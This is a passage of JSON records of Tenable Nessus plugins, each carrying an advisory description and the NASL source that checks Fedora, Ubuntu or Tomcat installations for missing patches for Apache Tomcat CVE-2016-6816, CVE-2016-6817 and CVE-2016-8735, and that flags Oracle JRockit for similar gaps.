16.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '16.04', 'pkgname': 'libservlet2.5-java', 'pkgver': '6.0.45+dfsg-1ubuntu0.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libservlet2.5-java');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:42:43", "description": "This updates includes a rebase from tomcat 8.0.38 up to 8.0.39 which resolves multiple CVEs :\n\n - \\#1397493 - CVE-2016-6816 CVE-2016-6817 CVE-2016-8735 tomcat: various flaws\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-15T00:00:00", "type": "nessus", "title": "Fedora 23 : 1:tomcat (2016-9c33466fbb)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:tomcat", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-9C33466FBB.NASL", "href": "https://www.tenable.com/plugins/nessus/95830", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-9c33466fbb.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95830);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-6817\", \"CVE-2016-8735\");\n script_xref(name:\"FEDORA\", value:\"2016-9c33466fbb\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Fedora 23 : 1:tomcat (2016-9c33466fbb)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This updates includes a rebase from tomcat 8.0.38 up to 8.0.39 which\nresolves multiple CVEs :\n\n - \\#1397493 - CVE-2016-6816 CVE-2016-6817 CVE-2016-8735\n tomcat: various flaws\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-9c33466fbb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected 1:tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"tomcat-8.0.39-1.fc23\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:tomcat\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:43:51", "description": "This updates includes a rebase from tomcat 8.0.38 up to 8.0.39 which resolves multiple CVEs :\n\n - \\#1397493 - CVE-2016-6816 CVE-2016-6817 CVE-2016-8735 tomcat: various flaws\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-15T00:00:00", "type": "nessus", "title": "Fedora 25 : 1:tomcat (2016-98cca07999)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:tomcat", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-98CCA07999.NASL", "href": "https://www.tenable.com/plugins/nessus/95829", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-98cca07999.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95829);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-6817\", \"CVE-2016-8735\");\n script_xref(name:\"FEDORA\", value:\"2016-98cca07999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Fedora 25 : 1:tomcat (2016-98cca07999)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This updates includes a rebase from tomcat 8.0.38 up to 8.0.39 which\nresolves multiple CVEs :\n\n - \\#1397493 - CVE-2016-6816 CVE-2016-6817 CVE-2016-8735\n tomcat: various flaws\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-98cca07999\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected 1:tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"tomcat-8.0.39-1.fc25\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:tomcat\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:07:09", "description": "According to its self-reported version number, the Apache Tomcat service running on the remote host is 8.5.x prior to 8.5.8 or 9.0.x prior to 9.0.0.M13. It is, therefore, affected by multiple vulnerabilities:\n\n - A flaw exists that is triggered when handling request lines containing certain invalid characters. An unauthenticated, remote attacker can exploit this, by injecting additional headers into responses, to conduct HTTP response splitting attacks. (CVE-2016-6816)\n\n- A denial of service vulnerability exists in the HTTP/2 parser due to an infinite loop caused by improper parsing of overly large headers. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to cause a denial of service condition.\nNote that this vulnerability only affects 8.5.x versions. (CVE-2016-6817)\n\n - A remote code execution vulnerability exists in the JMX listener in JmxRemoteLifecycleListener.java due to improper deserialization of Java objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-8735)\n\n - A denial of service vulnerability exists in the HTTP/2 parser due to an infinite loop caused by improper parsing of overly large headers. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to cause a denial of service condition. Note that this vulnerability only affects 8.5.x versions. (CVE-2016-6817)\n\nNote that Nessus Network Monitor has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-01-24T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.5.x < 8.5.8 / 9.0.0.x < 9.0.0.M13 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "9906.PASL", "href": "https://www.tenable.com/plugins/nnm/9906", "sourceData": "Binary data 9906.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:41:02", "description": "According to its self-reported version number, the Apache Tomcat service running on the remote host is 6.0.x prior to 6.0.48, 7.0.x prior to 7.0.73, 8.0.x prior to 8.0.39, 8.5.x prior to 8.5.8, or 9.0.x prior to 9.0.0.M13. It is, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists that is triggered when handling request lines containing certain invalid characters. An unauthenticated, remote attacker can exploit this, by injecting additional headers into responses, to conduct HTTP response splitting attacks. (CVE-2016-6816)\n\n - A denial of service vulnerability exists in the HTTP/2 parser due to an infinite loop caused by improper parsing of overly large headers. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to cause a denial of service condition.\n Note that this vulnerability only affects 8.5.x versions. (CVE-2016-6817)\n\n - A remote code execution vulnerability exists in the JMX listener in JmxRemoteLifecycleListener.java due to improper deserialization of Java objects. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-8735)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 6.0.x < 6.0.48 / 7.0.x < 7.0.73 / 8.0.x < 8.0.39 / 8.5.x < 8.5.8 / 9.0.x < 9.0.0.M13 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_5_8.NASL", "href": "https://www.tenable.com/plugins/nessus/95438", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95438);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-6817\", \"CVE-2016-8735\");\n script_bugtraq_id(94097, 94461, 94463);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Apache Tomcat 6.0.x < 6.0.48 / 7.0.x < 7.0.73 / 8.0.x < 8.0.39 / 8.5.x < 8.5.8 / 9.0.x < 9.0.0.M13 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Apache Tomcat\nservice running on the remote host is 6.0.x prior to 6.0.48, 7.0.x\nprior to 7.0.73, 8.0.x prior to 8.0.39, 8.5.x prior to 8.5.8, or\n9.0.x prior to 9.0.0.M13. It is, therefore, affected by multiple \nvulnerabilities :\n\n - A flaw exists that is triggered when handling request\n lines containing certain invalid characters. An \n unauthenticated, remote attacker can exploit this, by\n injecting additional headers into responses, to conduct\n HTTP response splitting attacks. (CVE-2016-6816)\n\n - A denial of service vulnerability exists in the HTTP/2\n parser due to an infinite loop caused by improper\n parsing of overly large headers. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to cause a denial of service condition.\n Note that this vulnerability only affects 8.5.x\n versions. (CVE-2016-6817)\n\n - A remote code execution vulnerability exists in the JMX\n listener in JmxRemoteLifecycleListener.java due to\n improper deserialization of Java objects. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-8735)\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n # https://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.48\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e8a81e1\");\n # https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.73\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c7e7b23\");\n # https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.39\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?833cb56a\");\n # https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.8\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87d6ed56\");\n # http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M13\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5f7bb039\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 6.0.48 / 7.0.73 / 8.0.39 / 8.5.8 / 9.0.0.M13 or\nlater.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8735\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed:make_list(\"6.0.48\", \"7.0.73\", \"8.0.39\", \"8.5.8\", \"9.0.0.M13\"), severity:SECURITY_HOLE, granularity_regex:\"^(6(\\.0)?|7(\\.0)?|8(\\.(0|5))?|9(\\.0)?)$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:44:09", "description": "This updates includes a rebase from tomcat 8.0.38 up to 8.0.39 which resolves multiple CVEs :\n\n - \\#1397493 - CVE-2016-6816 CVE-2016-6817 CVE-2016-8735 tomcat: various flaws\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "Fedora 24 : 1:tomcat (2016-a98c560116)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:tomcat", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-A98C560116.NASL", "href": "https://www.tenable.com/plugins/nessus/95904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-a98c560116.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95904);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-6817\", \"CVE-2016-8735\");\n script_xref(name:\"FEDORA\", value:\"2016-a98c560116\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Fedora 24 : 1:tomcat (2016-a98c560116)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This updates includes a rebase from tomcat 8.0.38 up to 8.0.39 which\nresolves multiple CVEs :\n\n - \\#1397493 - CVE-2016-6816 CVE-2016-6817 CVE-2016-8735\n tomcat: various flaws\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-a98c560116\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected 1:tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"tomcat-8.0.39-1.fc24\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:tomcat\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:27:01", "description": "The version of Oracle JRockit installed on the remote Windows host is 28.3.9. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists related to the Security subcomponent that allows a remote attacker to access potentially sensitive information. No other details are available. (CVE-2016-0695)\n\n - An unspecified flaw exists related to the JAXP subcomponent that allows a remote attacker to cause a denial of service. No other details are available.\n (CVE-2016-3425)\n\n - An unspecified flaw exists related to the JMX subcomponent that allows a remote attacker to execute arbitrary code. No other details are available.\n (CVE-2016-3427)", "cvss3": {}, "published": "2016-04-20T00:00:00", "type": "nessus", "title": "Oracle JRockit R28.3.9 Multiple Vulnerabilities (April 2016 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3425", "CVE-2016-3427"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/a:oracle:jrockit"], "id": "ORACLE_JROCKIT_CPU_APR_2016.NASL", "href": "https://www.tenable.com/plugins/nessus/90604", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90604);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-0695\", \"CVE-2016-3425\", \"CVE-2016-3427\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Oracle JRockit R28.3.9 Multiple Vulnerabilities (April 2016 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A programming platform installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle JRockit installed on the remote Windows host is\n28.3.9. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists related to the Security\n subcomponent that allows a remote attacker to access\n potentially sensitive information. No other details are\n available. (CVE-2016-0695)\n\n - An unspecified flaw exists related to the JAXP\n subcomponent that allows a remote attacker to cause a\n denial of service. No other details are available.\n (CVE-2016-3425)\n\n - An unspecified flaw exists related to the JMX\n subcomponent that allows a remote attacker to execute\n arbitrary code. No other details are available.\n (CVE-2016-3427)\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ffb7b96f\");\n # https://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html#AppendixJAVA\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?84e0e8de\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle JRockit version R28.3.10 or later as referenced in\nthe April 2016 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 